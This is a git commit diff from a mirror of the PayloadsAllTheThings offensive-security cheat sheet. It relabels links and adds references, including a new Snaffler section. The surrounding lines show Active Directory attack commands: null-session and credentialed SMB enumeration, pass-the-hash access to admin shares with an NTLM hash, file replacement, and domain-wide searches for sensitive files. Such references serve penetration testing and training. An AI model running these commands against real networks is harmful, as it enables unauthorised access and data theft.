mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Remove deadlink
This commit is contained in:
parent
1b037a9c64
commit
8df30de938
@ -848,7 +848,7 @@ Automated exploitation:
|
||||
|
||||
> Some shares can be accessible without authentication, explore them to find some juicy files
|
||||
|
||||
* [smbmap](https://github.com/ShawnDEvans/smbmap)
|
||||
* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap)
|
||||
```powershell
|
||||
smbmap -H 10.10.10.10 # null session
|
||||
smbmap -H 10.10.10.10 -R # recursive listing
|
||||
@ -856,7 +856,7 @@ Automated exploitation:
|
||||
smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
|
||||
```
|
||||
|
||||
* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
|
||||
* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
|
||||
@ -866,7 +866,7 @@ Automated exploitation:
|
||||
put # replace a file
|
||||
```
|
||||
|
||||
* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
|
||||
* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
|
||||
```powershell
|
||||
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
||||
Sharename Type Comment
|
||||
@ -896,6 +896,22 @@ Automated exploitation:
|
||||
smb: \> mget *
|
||||
```
|
||||
|
||||
|
||||
* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler)
|
||||
```ps1
|
||||
snaffler.exe -s - snaffler.log
|
||||
|
||||
# Snaffle all the computers in the domain
|
||||
./Snaffler.exe -d domain.local -c <DC> -s
|
||||
|
||||
# Snaffle specific computers
|
||||
./Snaffler.exe -n computer1,computer2 -s
|
||||
|
||||
# Snaffle a specific directory
|
||||
./Snaffler.exe -i C:\ -s
|
||||
```
|
||||
|
||||
|
||||
### SCF and URL file attack against writeable share
|
||||
|
||||
Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
|
||||
@ -4032,3 +4048,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
||||
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
||||
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
@ -1085,7 +1085,6 @@ layout template:
|
||||
## References
|
||||
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||
|
Loading…
Reference in New Issue
Block a user